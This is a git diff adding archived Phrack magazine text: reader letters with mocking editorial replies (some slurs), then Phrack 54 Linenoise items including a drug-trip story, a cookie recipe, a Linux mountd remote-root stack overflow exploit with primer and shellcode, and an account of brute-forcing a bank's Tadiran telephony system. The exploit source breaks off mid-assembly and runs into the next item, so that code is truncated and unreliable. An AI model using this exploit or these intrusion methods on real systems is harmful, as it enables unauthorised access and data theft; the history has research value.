+years.  been in the navy, man it sucked, but i want to commend y'all.
+but it's like they say, smart enough to do it, then do it, but it's your
+consequences.  to all the "real" people out here in this beloved world,
+too bad they don't know reality.  anyways, this is dope, it is the
+bomb.  
+
+    [ Word `em up on the level. ]
+
+--vadaka--
+
+0x11>-------------------------------------------------------------------------
+
+Hi. I am OmniLynx, and I'm thinking of starting a new Web-Zine for hackers.
+
+    [ Hey!  Sounds like a great niche market! ]
+
+In the true spirit of hacking, it will be free to anyone who wants it.
+
+    [ In the true spirit of martyrization and self-glorification. ]
+
+Unfortunately, at this point it is still just a thought, because I do not
+have enough sources to make it any good. I'd like to know if you would want
+to become a source for my Web-Zine. All you have to do is scout out tips,
+tricks, news stories, anecdotes, etc. for or about hackers. 
+
+    [ Please, may I?  Can I be your intern?  I'll be your Jimmy Olsen!
+      Let me set aside my professional career, my personal life, and my ezine
+      with it's 14+ year history and get _right_ on that. ]
+
+Unfortunately, you can't be paid for this, because it is free, but you will
+
+    [ BAH!  Who needs money?  Your adulation is payment enough! ]
+
+get your name published and, possibly, be able to express your thoughts in
+a column.
+
+    [ SHUT UP!  I would be able to write a column?!@  Wow!  I need to break
+      out my `Sony's My First Zine Kit` and get started! ]
+
+
+OmniLynx
+
+    [ Dude.  That's ironic. I almost chose the nick `EverpresentBobcat`. ]
+
+0x12>-------------------------------------------------------------------------
+
+HI phrack,
+
+I am just reading phrack #52 `phrack loopback'.
+
+You are just making me to laugh to dead. Better than any joke mailing-list
+
+    [ HOLY SHIT!  Dude, I don't want anyone to laugh to dead!  If everyone
+      laughs to dead, how will I get any repeat business? ]
+
+fred
+
+0x13>-------------------------------------------------------------------------
+
+Been fucking around on the internet for about 3 years.  After I got over
+the intial rush of "WOW, look at all this fuckin software!"
+
+    [ And porn. ]
+
+(and concurrently dumping OS/2 and msdog for Linux), I started reading...and
+reading....and reading...then I ran into Phrack.  In a word - KICKASS!
+
+    [ Thankz Cartman. ]
+
+I've been reading all of the issues the last couple of daze and I'm really
+impressed with the overall feeling of it.  It's great reading about past
+'battles' with the telco and systems (Phiber Optik stuff comes mind), the
+DETAILED instructions given about various terminals, and the schematics
+and stuff. History, Software and Hardware.
+
+    [ Don't forget all the great articles about bombs!  Smoke bombs, bolt
+      bombs, acetylene bombs, shell bombs...  Ah yes, the mid-80's were a
+      tumultuous time when youth felt the need to blow things up. ]
+
+Besides pussy and beer, I can think of no more interesting subjects.
+
+    [ Except perhaps degrading and objectifing women. ]
+
+I applaud the way you've kept it going by passing it on.  I applaud that
+you've remained true the idea "All information is public information - and the
+aquisition thereof".  I applaud the fact that it has survived this long - for
+free.  Next to the kernel - PHRACK[0-5][1-9] just might be the most important
+bits on my machine.  Keep it up fuckers - cause sure as taxation without
+representation, they are gonna try and stomp you (us).
+
+    [ (you). ]
+
+p.s. pointers on to how to hack sendmail to totally rewrite the headers
+and envelopes to reflect a completely bogus username/system (for
+purposes of anonymity - such as email like this) would be
+greatly appreciated.  If the pointer is 'grep sendmail ./PHRACK*' then...
+..<sheepish grin>....nevermind...
+
+You fuckers rock.....
+
+Deicide
+
+    [ I've decided you suck. ]
+
+0x14>-------------------------------------------------------------------------
+
+I can prog............If you tell me how to hack I'll send my best
+progs.......
+
+    [ Oh, that sounds like a fair trade. ]
+
+I am leada of Warco
+
+    [ I am Lothar of the Hill People. ]
+
+0x15>-------------------------------------------------------------------------
+
+Can you get me in touch with anyone in Chicago who can help me retreive
+deleted documents from my home computer.
+Thank You
+
+    [ I think Emil is free.  Give him a ring. ]
+
+0x16>-------------------------------------------------------------------------
+
+I WAS WONDERING IF YOU KNEW WHERE I COULD FIND OUT HOW TO CONNECT TO AND
+HAACK PEOPLE'S PERSONAL COMPUTERS, OR MAY'BE YOU KNOW.
+
+I'D APRECIATE SOME ADVICE,
+
+    [ Don't breed. ]
+
+X-3
+
+0x17>-------------------------------------------------------------------------
+
+I need An Infectiouse Virus to corupt a small network
+If you have any idea where i could get one send me aline
+
+    [ I need love and understanding.  I'll trade you. ]
+
+0x18>-------------------------------------------------------------------------
+
+Hey...I'm not into hacking or anything, but I read an article about you and
+Phrack in the Worcester Telegram and Gazzette this morning.  I just wanted to
+tell you that I feel your not bending to goverment pressure and everything is
+very kool.  This isn't about anarchy, it's about rights; freedom of the press.
+Ya know?  Anyhow,  I will not take up anymore of your time.  Remember, hackers
+have rights too.
+
+    [ Some of us have mean leftz too. ]
+
+0x19>-------------------------------------------------------------------------
+
+It would be nice to be able to contact someone to do some hacking for you
+in a specific manner.
+
+    [ Sorry.  We only hack in a vague, nebulous manner. ]
+
+Do you have any listings for this type of individuals?
+
+    [ Try http://www.fbi.gov/fugitive/fpphome.htm.  We usually recruit from
+      there. ]
+
+0x1a>-------------------------------------------------------------------------
+
+Hi there!
+        First off, just let me say how incredibly awesome and all powerful
+Phrack is, especially issue 52.
+
+    [ A SUPREMELY POWERFUL JUGGERNAUT OF EFFICACIOUS POWER! ]
+
+You have an amazing 'zine here, and I bow before you and worship the ground
+you walk on. In fact, I think world domination is now in your grasp.
+
+    [ Shure, if all the world was as obsequious as you, we'd be set. ]
+
+< Yes, I'm hitting on you :P >
+
+    [ Cool.  Are you a hot chick?  If not, back off fagbasket. ]
+
+        Really though, I'm just writing to thank you for Phrack Loopback.
+
+    [ A self-fulfilling prophecy.  Here we are. ]
+
+While everything in Phrack is good, and the majority is great (as rated on
+
+    [ How can everything be good, yet the majority be great? ]
+
+the sliding scale of total goodness), the thing that gives me the most
+spiritual fulfillment every issue is Loopback. It provides 78% of daily
+allotted humor and 37% of the required sarcasm for mental well being.
+
+    [ And now you're a part of the love.  *hug* ]
+
+        So, once more, thank you for the brilliant staff you have at
+Phrack, and thanks as well to the people who write in!
+
+    [ KEEP THOSE LETTERS AND CARDS COMING! ]
+
+Unit3
+
+0x1b>-------------------------------------------------------------------------
+
+Hello, i know i am going to sound very lame when i ask this.  I would
+really like it if you could give me a quick breif description on how to
+hack into system remotely i can hack but i can break into systems
+without having a login and pw, well thnx ne ways
+
+    [ You suck. ]
+
+0x1c>-------------------------------------------------------------------------
+
+I don't really know who to contact about this.  It's a complament to all
+of phrack magazine about the owning thing.
+
+I am glad to see u guys take it well.   I don't know if i would be able
+to take it as well.  But it is definitely respectful.  I and many other
+people already respected phrack magazine a lot.. but now I definitely
+have a lot more respect for phrack.
+
+    [ Dude, you get anymore respect for us and you'll officially qualify for
+      the `Phrack Magazine Hoover Super Suck-up Award`.  It's a pretegious
+      award only given out to a select few.  You're defnintely in the
+      running. ]
+
+SPy109
+
+0x1d>-------------------------------------------------------------------------
+
+sir
+when i down load an item from your page its in X's O'o and boxes.
+
+    [ Oh.  You must have reached our tic-tac-toe server by mistake.  Try
+      the URL again. ]
+
+i tryed ms/word note pad/ and no luck. can you help,im also looking for an
+article on how to go through the back door of AOL
+
+    [ I think there's one in the Virginia office, on the second floor.  It's
+      Penski's office, and he never locks his door, that fucking moron. ]
+
+from my office to my home over the Internet.
+
+    [ Oh.  In that case, did you try wishing really, really hard?  That
+      usually works for me. ]
+
+so i could check on my spouse who i think is doing me wrong.
+
+    [ Oh, I can assure you, your spouse is up to no good.  I think you should
+      definitely get a divorce and take the kids. ]
+
+thanks
+
+0x1e>-------------------------------------------------------------------------
+
+[ P53-07: A Stealthy Windows Keylogger ]
+
+Dearest Phrack,
+
+I read  "A Stealthy Windows Keylogger" in Phrack 53.7. Huh? Just
+call SetWindowsHookEx(). It's built right into the operating system. It
+lets you grab key strokes. It's simple. It even works on Windows NT.
+
+There is no reason to go hooking interrupts or writing chunks of
+inline assembly.
+
+The documentation explains how SetWindowsHookEx() works. If that's still
+not enough to go on, the Microsoft SDK ships with example programs that
+grab key strokes.
+
+        - Iskra
+
+0x1f>-------------------------------------------------------------------------
+
+I see and hear all this about hackers; however, I never see and/or hear about
+how it is done.
+
+    [ Like ninjas, true hackers are shrouded in secrecy and mystery.  You may
+      never know -- UNTIL IT'S TOO LATE. ]
+
+The reason I am asking is because of a soon-to-be-ex-wife who stole me cash I
+
+    [ Are you Irish? ]
+
+operate my business with.  I know she has placed the money in a bank somewhere
+in my home town.  Is there a way to find out which bank if I know she SSN?
+
+    [ I bet she's one of those fiery Irish Lass's with flowing locks of red
+      hair and glittering green eyes.  You think she'd go for me?  How much
+      money she gank from you...  Enough for her to run away and lavish me
+      with gifts? ]
+
+------------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack54/3.txt b/phrack54/3.txt
new file mode 100644
index 0000000..fc39d6e
--- /dev/null
+++ b/phrack54/3.txt
@@ -0,0 +1,1357 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12
+
+
+-------------------------[  P H R A C K     5 4     L I N E N O I S E
+
+
+--------[  Various
+
+
+0x1>-------------------------------------------------------------------------
+
+The r00t/h4g1s peace summit - 1998
+----------------------------------
+
+    In a digital world marred by strife and conflict, it was only fitting
+that the two mega-super powers of the digital underground met for a peace
+conference somewhere they could partake of the peace pipe.  Amidst the
+quaint silence of the fluttering windmills of Holland, the representatives
+of their respective parties settled in for a week of negotiations in the
+heart of Amsterdam.
+
+Day 1:
+    They paint fake flies (the flying kind, not the zipper kind) on the
+toilets in the Schlipteinheinekinoffien airport in Amsterdam, because,
+as we all know, hackers can't resist a good target.  The next stop was
+to our official reception at the Hotel Ibis.  I walked into the room,
+meeting face to face with 7 of the most notorious and feared hackers
+alive.  My heart raced, and I felt all the sweat glands on my body release
+in one giant orgasmic instant.  And then I started coughing...
+
+Day 2:
+    My throat severely scarred from the previous day of going to "coffee"
+shops and buying (legally) some marijuana with such names as "The Elite
+Buddha", and "Zero Day", we set out for some serious negotiations on the
+second day.  Our mission was to create a truce, allowing the free
+transportation of our packets, unencumbered, unmodified, and unmonitored,
+across the Internet.  H4g1s demanded r00t supply them with "-1 Day" in
+exchange for peace.
+    r00t requested a "-1 day" from an Internet savvy street person who kept
+reminding us of our r00t brother, X.  The street person, we'll call him
+Outlaw, showed us some pills, but they did not appear to be what
+h4g1s was looking for.  So, we decided to move on.  Outlaw, however, had
+other ideas.  He wanted his 25 guilders to take his aspirin to X,
+apparently (For those of you unfamiliar, a guilder is the Netherlands unit
+of money, and roughly resembles monopoly money, except a guilder isn't
+really worth anything, whereas monopoly is fun!).  We refused, and Chico
+got mad.  He started telling us, "WE ARE GOING TO HAVE A PROBLEM SOON."
+After that, things were "STARTING TO GET VERY SERIOUS."  Finally, Chico
+got pissed off and broke a beer bottle and started going insane, so r00t &
+h4g1s made a temporary truce and started running.
+   After turning several corners, the mad outlaw was chasing after us with
+his broken glass wielding in the cold winter night.  We were now in the
+"red light district", the physical equivalent to the place on the Internet
+where you can buy whores and have sex with them, and people were looking
+at us funny being chased through the streets.
+
+Day 4:
+    We slept through day 4.
+
+Day 3:
+    Things were getting very strange in Amsterdam.  Most notably, day 3
+happened AFTER day 4.  Don't ask me how.  It may have related to the
+fungus located within a "Inner Visions" container that we consumed in
+the hopes of progressing our talks further.  We played some Ultima Online,
+except we didn't use any computers.  I think there was a strange
+steakhouse experience at some point this day, but I can't provide any
+further details.
+
+Day 5:
+    Everything in the world is energy vibrating at different rates.  If we
+can find some way to make our own matter vibrate at a consistently faster
+rate we can transcend the physical universe and enter the digital plane.
+I think we need to switch tenses back to the past before.  With Outlaw out
+of the picture, we resumed our negotiations over some spacecakes (its like
+a brownie, or a muffin, or a donut, except it has Zero Day in it).
+
+Day 6:
+    I thought we ate all the shrooms in Day Pi!  Ok, fine.  Things are
+easier to handle when you have a vision.  Vision is just a hallucination
+induced by energy waves bouncing around in your head.  Your head is cool.
+COOL is a lame stock.  EBAY is insanely overpriced.  So are M3s.  Mach 3's
+are cool razors.  Razors are sharp.  Sharp MD players are too thick.  As
+is Mark's cock.  And long!
+
+-r00t & h4g1s
+
+0x2>-------------------------------------------------------------------------
+
+A CASE STUDY: LINUX MOUNTD STACK OVERFLOW
+
+There is nothing new here, but the code is a text book example of how buffer
+overflows are done. Even if you have read other articles on buffer overflows
+you might find something of value in here. Or maybe not. The case studied
+is the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on
+Aug 28.
+
+nuuB
+
+
+<++> linenoise/mountd-sploit.c
+/*
+ * mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will
+ *                   give a remote root shell.
+ *
+ * Cleaned up, documented and submitted to Phrack on Sep 3 1998.
+ *
+ * I've included a quick primer on stack overflows and made lots of comments
+ * in the code, so if you don't know how these stack overflow exploits work
+ * take this opportunity to learn something.
+ *
+ * It is trivial to extend the code (or use scripting) to make something that
+ * automatically scans subnets or lists of IPs to find vulnerable systems.
+ * This is left as an exercise for the enterprising young hax0rs out there.
+ *
+ * You need the following RPC files for your particular architecture:
+ *
+ *   nfsmount.h
+ *   nfsmount_xdr.c
+ *
+ * These can be generated from 'mount.x' by the 'rpcgen' utility. I simply
+ * lifted the files that came pre-generated with Linux 'mount'. These are
+ * included uuencoded, but they may not work on your particular system. Don't
+ * bug me about this.
+ *
+ * Compile with:
+ *
+ * cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit
+ *
+ * Have fun, but as always, BEHAVE!
+ *
+ * /nuuB
+ *
+ */
+
+/*
+  A QUICK PRIMER ON STACK OVERFLOWS
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed
+  explanation on how to write sploits (the examples are for Linux/i386 but
+  the methodology is valid for any Unix, and can be applied to other OS's
+  once you understand the technique). If you are targeting one of Bill's OS
+  check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog.
+
+  The properties that we take advantage of are:
+  
+  * The stack memory pages have the execute bit set
+  * The return address from functions are stored on the stack on a higher
+    address than the local variables.
+
+  MEMORY MAP
+   
+   -- Start of stack (i.e bottom of stack - top of memory) e.g 0xc0000000 --
+    <environment variables>
+    <stack frames from main() down to the function calling our function>
+    <arguments to the vulnerable function>
+    <** return address **>
+    <frame pointer for prev frame - unless compiled with -fomit-frame-pointer>
+    <local variables for the vulnerable function>
+   -- Top of stack (lower memory address) e.g 0xbffff9c8 --
+
+  THE OVERFLOW
+
+  The trick is to overflow a local variable that is set through a function
+  that doesn't check for overflows (strcpy, sprintf, etc). By supplying a
+  (too) long string you can overwrite memory at higher addresses, i.e closer
+  to the start of the stack. More specifically we want to overwrite
+  <** return address **> with a pointer that points back into the stack that
+  contains code we want executed. Getting the code on the stack is done by
+  including it in the string we are overflowing with, or by placing it in
+  an environment variable.
+
+  The code can do anything you like, but the standard thing is to execve()
+  a shell. There are often limitations on what the code can look like in
+  order to be placed unmangled on the stack (length, touppper(), tolower(),
+  NULL bytes, path stripping etc). It all depends on how the target program
+  processes the input we feed it. Be prepared for some tinkering to avoid
+  certain byte patterns and to make the code use PC/IP relative addressing.
+
+  The overflow string (called the 'egg') is normally passed to the
+  target program through command line arguments, environment variables,
+  tcp connections or in udp packets.
+
+  POSSIBLE COMPLICATIONS
+
+  Sometimes you will destroy other local variables with your egg (depends on
+  how the compiler ordered the variables on the stack). If you use a long
+  enough egg you could also trash the arguments to the function. As your code
+  isn't executed until the vulnerable function returns (not at the return of
+  the function doing the actual overflowing, e.g strcpy()), you must make sure
+  that the corrupted variables don't cause a crash before the return. This
+  means that your egg probably has to be aligned perfectly, i.e only use one
+  return pointer and preceed it with 'correct' values for the local variables
+  you are trashing. Unfortuntely the ordering of the variables is often
+  dependent on what compiler options were used. Optimization in particular
+  can shuffle things around. This means that your exploit will sometimes have
+  to target a particular set of options.
+
+  Most of the time the trashing of other local variables isn't a problem but
+  you may very well run into it some day.
+
+  THE RETURN POINTER
+
+  The only problem left is to guess the right address to jump to (i.e the
+  return pointer). This is done either by trial and error or by examining the
+  executable (requires you have access to a system identical to the target).
+  A good way to get a reasonable starting value is to find out how much
+  environment variables the target process has (hint: use 'ps uxawwwwwwwwe')
+  and combine that with the base stack pointer (you can find that out with
+  a one line program that shows the value of the stack pointer).
+  To increase the chances of success it is customary to fill out the start of
+  the egg with NOP opcodes, thus as long as the pointer happens to point
+  somewhere in the egg before the actual code it will execute the NOPs
+  then the code.
+
+  That is all there is to it.
+
+*/
+
+
+/*
+ * Now, back to our case study.
+ *
+ * Target: rpc.mountd:logging.c
+ *
+ * void Dprintf(int kind, const char *fmt, ...) {
+ *   char buff[1024];
+ *   va_list args;
+ *   time_t now;
+ *   struct tm *tm;
+ *
+ *   if (!(kind & (L_FATAL | L_ERROR | L_WARNING))
+ *      && !(logging && (kind & dbg_mask)))
+ *          return;
+ *   ...
+ *   vsprintf(buff, fmt, args);   <-- This is where the overflow is done.
+ *   ...
+ *   if (kind & L_FATAL)
+ *       exit(1);
+ * }   <-- This is where our code (hopefully) gets executed
+ *
+ * This function is called from (e.g) mountd.c in svc_req() as follows:
+ *
+ * #ifdef WANT_LOG_MOUNTS
+ *     Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n",
+ *             inet_ntoa(addr), argbuf);
+ * #endif
+ *
+ * Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type
+ * L_WARNING is always logged, and all we have to do is to try to mount
+ * something we are not allowed to (i.e as long as we are not included in
+ * /etc/exports we will be logged and get a chance to overflow). 
+ *
+ * The only complication is the first %s that we will have to compensate for
+ * in the egg (our pointers must be aligned correctly).
+ *
+ * We use 5 pointers to avoid problems related to how the compiler organized
+ * the variables on the stack and if the executable was compiled with or
+ * without -fomit-frame-pointer.
+ *
+ * 3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5
+ *
+ * Still plenty of room left for NOPs in the egg. We do have to make sure that
+ * if the 3 other variables are trashed it won't cause any problems. Examining
+ * the function we see that 'now' and 'tm' are initialized after the vsprintf()
+ * and are thus not a problem. However there is a call 'va_end(args)' to end
+ * the processing of the ellipsis which might be a problem. Luckily this is
+ * a NOP under Linux. Finally we might have trashed one of the arguments
+ * 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind'
+ * will cause a exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008).
+ * Again, we are in luck. 'kind' is referenced earlier in the function and in
+ * several other places so the compiler has gratiously placed it in a register
+ * for us. Thus we can trash the arguments all we want.
+ * 
+ * Actually, if you examine the executables of mountd in the common distros
+ * you will find that you don't have to trash any variables at all as 'buffer'
+ * is placed just before the frame pointer and the return address. We could
+ * have used a simple egg with just one pointer and this would have worked
+ * just as well in practise.
+ *
+ * All this 'luck' is in fact rather common and is the reason why most buffer
+ * overflows are easy to write so they work most of the time.
+ *
+ * Ok. Delivery of the egg is done through the RPC protocol. I won't go into
+ * details here. If you are interested, get the sources for the servers and
+ * clients involved. Half the fun is figuring out how to get the egg in place.
+ *
+ * The last piece of the puzzle is to keep shoveling data from the local
+ * terminal over the TCP connection to the shell and back (remember that
+ * we used dup2() to connect the shell's stdout/in/err to the TCP connection).
+ *
+ * Details below.
+ */
+
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <rpc/rpc.h>
+#include <rpc/pmap_prot.h>
+#include <rpc/pmap_clnt.h>
+
+#include "nfsmount.h"
+
+/* 
+ * First we need to write the code we want executed.
+ *
+ * C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh");
+ *
+ * setreuid() is probably not necessary, but can't hurt.
+ *
+ * fork() is done to change pid. This is needed as someone - probably the
+ * portmapper - sends signals to mountd (the shell has no handlers for these
+ * and would die).
+ *
+ * The dup2()'s connect stdout/stderr to the TCP socket.
+ *
+ * The code assumes 'mountd' communicates with the client using descriptor
+ * zero. This is the case when it is started as a daemon, but may not be so if
+ * it is launched from inetd (I couldn't be bothered to test this). The
+ * dup2()'s may need to be changed accordingly if so.
+ *
+ * For Linux/i386 we would get:
+ */
+
+#if 0
+
+void c0de() {
+  __asm__(
+	  "jmp .get_string_addr\n\t" /* Trick to get address of our string */
+	  ".d01t:\n\t"
+
+	  "xorl %eax,%eax\n\t"
+	  "movl %eax,%ebx\n\t"  /* ruid=0 */
+	  "movl %eax,%ecx\n\t"  /* euid=0 */
+	  "movb $0x46,%eax\n\t" /* __NR_setreuid */
+	  "int $0x8
+
+0x3>-------------------------------------------------------------------------
+
+Eleet ch0c0late ch1p co0kies
+
+by Juliet
+
+The chocolate chip cookies is an old exploit.  You can use it to bribe
+your teachers, sysadmins, bosses, even feds.  Never underestimate the
+cookie.  Picture this.. little girlie walks up to you in the NOC.. offers
+you a home-baked chocolate chip cookie!  She must be someone's secretray..
+or something.. wow she sure fooled you.. anyway.. bake them.. they are
+good.. DO NOT substitue ingrediants.. other than like M&M's for chocolate
+chips..
+
+
+1 cup (packed) golden brown sugar
+1/2 cup sugar
+1/2 cup solid vegetable shortening, room temperature
+1/2 cup (1 stick) unsalted butter, room temperature
+2 large eggs
+1 tablespoon vanilla extract
+3 cups all purpose flour
+1 teaspoon baking soda
+1 teaspoon salt
+1 12-ounce package semisweet chocolate chips
+
+Preheat oven to 350F. Using electric mixer, beat both sugars, shortening
+and butter in large bowl until light and fluffy. Beat in eggs and
+vanilla. Mix flour, baking soda and salt in large bowl. Add dry
+ingredients to butter mixture and mix until blended. Stir in chocolate
+chips.
+
+Drop dough by heaping tablespoonfuls onto heavy large baking sheets, spacing
+2 inches apart. Bake until golden brown, about 12 minutes. Transfer baking
+sheets to racks; cool 5 minutes. Transfer cookies to racks;
+cool completely.
+
+Makes about 42 cookies.. or you can make ONE BIG pan cookie
+
+0x4>-------------------------------------------------------------------------
+
+          - Tadiran; Computer Telephony Integration (CTI) -
+                Blakboot <blakboot@darkcartel.com>
+
+                       
+Introduction
+============
+
+Hello everyone.  This article is primarily about Tadiran Telecommunications
+software and hardware used to syncronize computer applications with phone 
+calls.  I will be refering to system version 9.63.03.01 and any variants as 
+just `Tadiran`.  From firsthand experiences with this type of system I've
+found  that they can be configured to do many things, from trunk timers to
+on hold music.
+
+Although a very powerful system, the Tadiran lacks basic security.  This is
+a no no, especially when it provides worldwide technologies for all types
+of industries, including banking.
+
+The issue of lack of security is mainly why I wanted to write this article.
+The Tadiran is very much open to intrusion.
+ 
+ 
+How it began
+============
+ 
+A phreak friend of mine, Mf-Man, and I were scanning for loops, we found
+a carrier.  We took a short look at the system for a while, until our
+interests waned and took us elsewhere..
+
+Months later, bored, I dialed into the system, with plans of throwing a
+dictonary file at it at steady pace (Tadiran, only requires a password for
+authentication).
+
+So, I just sat back, and waited...  After a long while, to my gleeful
+surprise, it cracked!  I (like many others before me) did that zealous
+happy dance.
+
+This system, Tadiran, is rather cryptic without documentation.  Even still,
+I managed to dig up some interesting info.  This system I managed to get
+into was that of a CTI system from a well known bank.  The major flaws thus
+far (I plan to write a more in depth article):
+
+    * Unlimited password attempts.
+    * No login names.
+    * A password prompt that responds, well, promptly.
+
+What follows are some screen shots of the Tadiran system. 
+ 
+The system
+==========
+ 
+Password prompt:        ENTER PASSWORD  
+Bad password Msg.:      ILL PASSWORD  , TRY AGAIN !
+System prompt:          *:
+Enviroment:             Tree menus; menus branch from root, and so on.
+ 
+            
+            -This the root menu, the menu sent upon login.-
+ 
+(ROOT)
+CCS       9.63.03.01     SMDI & 24SDT                          
+Copyright (c) 1991-1997 Tadiran Telecommunications Ltd.
+NAME  - xxxxxxxxx  
+SAU # -    xxxx     
+  0-CONFIG
+  1-DIAGN
+  2-TABLES
+  3-ADMIN
+  4-ROUTING/COST
+  5-ISDN
+  6-DATA
+  7-CoraLINK
+  8-NETWORK
+  9-HELP
+ 
+      Any of the menus/options can be choosen by number, or name.
+ 
+Control keys:
+        ^C / ESC  ------ Go back 1 menu.
+              
+              ^T  ------  Displays account and system information.
+                 EXAMPLE:
+                        
+                        CCS: xxxxxxxx  xxx-xx-1998 10:48pm  
+                        Terminal No.: 4,  Password level: 0  
+                        Software Version:   9.63.03.01     SMDI & 24SDT
+              
+              ^P  ------ Relogin. 
+ 
+/* There are others--they seem have something to do with emulation, 
+and scrolling. *\
+ 
+ 
+ 
+Menu descriptions - ment for reference.
+=========================================
+ 
+This is a list of globally accessable menus, available by typing, "HELP"      
+<Note> I've "x"'d out all group names from the orignal system this 
+      information was recovered from.
+ 
+ 
+PI MESSAGES     =(MSG)     FEAT. & AUTH. =(FEAT)     SMDR CONTROL  = (SMDR)
+47/8T CARD_DB  =(TKDB)     FEATURE TIMERS=(FE.T)     STATION TIMERS =(ST.T)
+ALT ROUT TK.GRP=(ROUT)     GROUPS       =(GROUP)     SYSTEM GEN.  =(SYSGEN)
+xxxx/xxx GROUP =(xxxx)     xxxxxxx GROUP =(xxxx)     SYS FEATURES   = (SFE)
+xxxx GROUP     =(xxxx)     IST/SLT CARD_DB=(STDB)    SYS TIME SET-UP=(TIME)
+BUSY PORTS     =(BUSY)     IST/SLT DEF.   =(SLT)     TERMINAL SET-UP=(TERM)
+CARD DATA-BASE = (CDB)     LCR/ROUTING    =(LCR)     TOLL BARRIER   =(TOLL)
+CARD LIST      =(CLIS)     xxxxxxxxx      =(xxx)     TONE PLAN      = (TON)
+CLASS OF SERVICE=(COS)     xxxxxxxxxxxxx=(xxxxx)     TRUNK DEFINITION=(TRK)
+COST_CALC.     =(COST)     NUMBERING PLAN =(NPL)     TRUNK_GROUP    =(TKGP)
+DATA SERVICES  =(DATA)     PICKUP GROUP  =(PICK)     TRUNK GRP DEF =(TGDEF)
+xxxx CARD DB   =(DIDB)     PORT DATABASE  =(PDB)     TRUNK PORTS   =(TRUNK)
+xxx/xxx GROUP  =(DIDG)     PORT LIST     =(PLIS)     TRUNK TIMERS   =(TK.T)
+DIGITAL TRUNK  =(DTDB)     PREFERENCE    =(PREF)     WAKEUP       =(WAKEUP)
+KEY DEFINITION = (KEY)     DIGITAL BUS LIST=(DLIS)   ZONED GROUP     =(VPZ)
+KEY PROGRAMING =(PROG)     RINGER P.S.    =(RPS)     VFAC           =(VFAC)
+KEYSET TIMERS  =(EK.T)     SIZES DEF      =(SIZ)     GROUP CALL     =(CALL)
+ 
+PI MESSAGES - Terminal setup, diag/stim.
+47/8T CARD_DB - Card information. Example:
+                        LS_RING_PAUS (sec)-  5  
+                        GS_RING_PAUS (sec)-  1  
+                        O/G BREAK_TIME(ms)- 60  
+                        O/G MAKE_TIME (ms)- 40  
+                        O/G INTERDGT_T(ms)- 800  
+                        GS_DISCONNECT (ms)- 800                  
+                         METER (4TMR) :
+                        f0 (0=16K,1=12K,2=50Hz)- 0  
+                        f0 ACCURACY +/-(1-10)% - 3  
+                        METER_AFTER_DISCONNECT (Y/N) - N     
+ 
+ALT ROUT TK.GRP - Add, display, update, or remove trunk group.
+BUSY PORTS - Displays what ports are busy.
+CARD DATA-BASE - List many submenus of card, in which you may get/update 
+CARD LIST - EXAMPLE:
+ shelf#/slot#  p_type     i_type    card_db#   vers/subver  status 
+     0 / 1     NO_CARD    NO_CARD  ---        ---   ---     ------           
+     0 / 2     8DTR/S     NO_CARD  ---        17    8       ACTIVE           
+     0 / 3     T1         T1       1          14    38      ACTIVE           
+ 
+CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on 
+                   trunk control. TENANTS deals with group access.
+COST_CALC. - Information about costs for certain services, at various
+             times.
+DIGITAL TRUNK - Card/trunk information, configuration, channel signaling.
+KEY DEFINITION - Telephone configuration 
+                 EXAMPLE:
+prm_cos-    1      sec_cos-   1      priv_libs-   12      terminal-   N 
+origin-     N      block-     N      o/g_tk_rest-  N      privacy-    Y 
+excl_hold-  N      hard_hold- N      last_num-     Y      security-   N 
+att-        Y      auto_unatt-N      passcode-     NONE   check_out-  N 
+multi_app-  Y      m.a.mute_ring-Y   mute_ring-    Y     
+auto_ans-   N      idle_disp.-Y      keyclick-     Y      music-      Y 
+music_num-  0      v_page_in- Y      auto_ans_v_p- Y      auto_hld/xfer/off-1
+spkr_on/off-Y      blind_att- N      pcc-          Y      pc_acd-     N 
+mic-        Y      comb_audio-N      display_size- NO_DSP language-DEFAULT  
+but_num-    2      ksi-       N      ksi_type-     0 
+eis-        N      send_id-   Y      ali-       NONE      aoc-e_display-N 
+alert_makecall-N 
+active dpem id's- NONE    installed dpems- 1
+dkt: spkr_environment- 1
+music_on_hold - 0
+ 
+KEYSET TIMERS - EXAMPLE:
+                        1 unit = 0.1 sec.
+        
+                        AUTO_ANSWER     -    10  
+                        AUTO_ANS_V_PAGE -    10  
+                        TONE_TO_IDLE    -    10  
+                        AOC-E_DISPLAY   -   300  
+                        MUTE_RING       -    50  
+ 
+FEAT. & AUTH - Authorizations, and system features. Check here to 
+               see if Call trace OR caller ID is active. 
+ 
+FEATURE TIMERS - This is a bit interesting. 
+                 EXAMPLE:
+                        *  (1 unit =1.0  sec)
+                        ** (1 unit =0.1  sec)
+                        ***(1 unit =0.01 sec)
+                        *AUTO_REDIAL-  30  
+                        *REMIND_SNOOZE-  60  
+                        *WAKEUP_SNOOZE-  60  
+                        **WAKEUP_RING - 300  
+                        **NET_FEATURE_ACK-   40          
+                        **SUSP_OFFHK-    5  
+                        BELL_RING:
+                        **ON_BELL  -   10  
+                        **OFF_BELL -   20  
+                        **ATT.MSG-   50  
+                        **EXPENSIVE_ROUTE_TONE -  10  
+                        **RING- 100  
+                        **SUPV_RECALL- 3600  
+                        **CONF_SUPV_RECALL- 1800  
+                        **BREAK_IN/OUT-   10  
+                         BREAKIN_WARNING:
+                                **ON  -    1  
+                                **OFF -   20  
+ 
+GROUPS - List of submenus, of groups.
+IST/SLT CARD_DB - Ring information.
+IST/SLT DEF. - Slot of line info.
+               EXAMPLE:  
+        prm_cos-  0 sec_cos-   0 priv_libs-  3    terminal-   N 
